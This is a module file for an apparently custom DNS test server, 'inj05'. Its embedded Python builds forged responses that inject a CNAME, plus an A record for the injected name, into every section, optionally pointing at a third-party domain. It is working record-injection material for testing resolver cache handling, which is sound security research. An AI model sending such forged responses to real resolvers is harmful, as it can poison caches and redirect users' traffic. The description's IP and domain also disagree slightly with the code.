[module]
name = "inj05"
type = "feature"
info = "Injection 5 - CNAME and A records in all sections"
desc = "Respond with CNAME (inj05poc.yourdomain.com) in all sections + inject also A record of it (inj05poc.yourdomain.com -> 6.6.6.6) in all sections."
author = "ivan.jedek@oryxlabs.com"
category = "Record injections"

code = '''
if req.first_subdomain.startswith("inj05"):
   # In all sections, send some CNAME + also IP of it
   injip = "6.6.6.5"
   addedquestions = b''
   if "3rdparty" in req.subdomains:  # inject a 3rd party domain
      injdom = "injected05." + a3rdparty_domain
   else:
      injdom = "injected05." + req.sld_tld_domain
   if "rpq" in req.subdomains:  # replace the question with our injected stuffs
      orig_req_domain = req.full_domain
      req.full_domain = injdom
      addcustomlog("RPQ")
   if "adq" in req.subdomains:  # add additional question for our injected stuffs
      resp.QURR = req.QURR+1
      addedquestions  = convDom2Bin(injdom) + req.type_bin + req.class_bin
      addcustomlog("ADQ")
   ### DNS header ########
   buffer = prep_dns_header(b'\x84\x00', resp.QURR, 2, 2, 2)
   ### QUESTION SECTION ########
   if resp.noq: buffer += convDom2Bin(req.full_domain) + req.type_bin + req.class_bin
   buffer += addedquestions
   ### ANSWER SECTION ########
   # CNAME
   buffer += b'\xc0\x0c' if resp.compress else convDom2Bin(req.full_domain)
   buffer += getTypeBin("CNAME") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                 ## TTL
   buffer += struct.pack(">H", len(injdom)+2)            ## Data length
   buffer += convDom2Bin(injdom)                         ## CNAME value
   # injected A
   buffer += convDom2Bin(injdom) + getTypeBin("A") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                 ## TTL
   buffer += struct.pack(">H", 4)                        ## Data length
   buffer += socket.inet_aton(injip)                     ## IP
   ### AUTHORITY SECTION ########
   # CNAME
   buffer += b'\xc0\x0c' if resp.compress else convDom2Bin(req.full_domain)
   buffer += getTypeBin("CNAME") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                 ## TTL
   buffer += struct.pack(">H", len(injdom)+2)            ## Data length
   buffer += convDom2Bin(injdom)                         ## CNAME value
   # injected A
   buffer += convDom2Bin(injdom) + getTypeBin("A") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                 ## TTL
   buffer += struct.pack(">H", 4)                        ## Data length
   buffer += socket.inet_aton(injip)                     ## IP
   ### ADDITIONAL SECTION ########
   # CNAME
   buffer += b'\xc0\x0c' if resp.compress else convDom2Bin(req.full_domain)
   buffer += getTypeBin("CNAME") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                 ## TTL
   buffer += struct.pack(">H", len(injdom)+2)            ## Data length
   buffer += convDom2Bin(injdom)                         ## CNAME value
   # injected A
   buffer += convDom2Bin(injdom) + getTypeBin("A") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                 ## TTL
   buffer += struct.pack(">H", 4)                        ## Data length
   buffer += socket.inet_aton(injip)                     ## IP
   # log and send
   log("CNAME %s + A %s (%s) in ALL sections" % (injdom, injdom, injip))
   send_buf(self, buffer)
   #####################################################################
'''
